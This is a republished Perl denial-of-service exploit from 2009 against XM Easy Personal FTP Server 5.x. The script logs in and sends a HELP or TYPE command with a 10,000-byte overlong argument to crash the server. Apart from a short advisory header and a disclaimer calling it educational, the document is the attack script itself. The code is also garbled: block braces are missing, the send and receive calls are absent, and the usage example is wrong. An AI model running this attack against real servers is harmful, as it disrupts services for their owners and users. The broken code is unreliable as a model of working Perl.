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Denial of service exploit for the XM Easy Personal FTP Server
来源:vinodsharma.mimit[at]gmail.com 作者:Sharma 发布时间:2009-06-11  
#!usr/bin/perl -w

#   XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
#   via a "HELP" or "TYPE" command with an overly long argument.
#   Refer:
#        												http://secunia.com/advisories/35271/
#        Original advisory avaiable at:	http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/
#		  Product link:	http://www.dxm2008.com/
#$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$
#        Author:    Vinod Sharma
#        Email:     vinodsharma[underscore]mimit[at]gmail.com
#        Blog:       http://securitygyan.com/
#        Date:      09th june, 2009
###Thanks all the Security Folks###

use IO::Socket;

my $server_ip=$ARGV[0];
my $server_port=$ARGV[1];
my $username=$ARGV[2];
my $password=$ARGV[3];
my $command=$ARGV[4];
my $buffer=$command ." " ."\x41" x 10000 ."\r\n";          

if(($#ARGV + 1)!=5)
				print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";
				print "\nargument command can have a value HELP or TYPE\n";
				print "\nExample: XM_FTP_Serv_Exploit.pl 21 anonymous 123456 HELP";

$socket = new IO::Socket::INET (PeerAddr  =>$server_ip,  PeerPort  => $server_port, Proto => 'tcp', )   or die "Couldn't connect to Server\n";

while (1)
    print "RECIEVED: $recv_data"; 
	$send_data1 ="USER ".$username."\r\n";
    print "RECIEVED: $recv_data1"; 
	   $send_data2 ="PASS ".$password."\r\n";
        print "RECIEVED: $recv_data2"; 
	   print "\nAttack is send.....................\n";
        print "RECIEVED: $recv_data3"; 
		close $socket;

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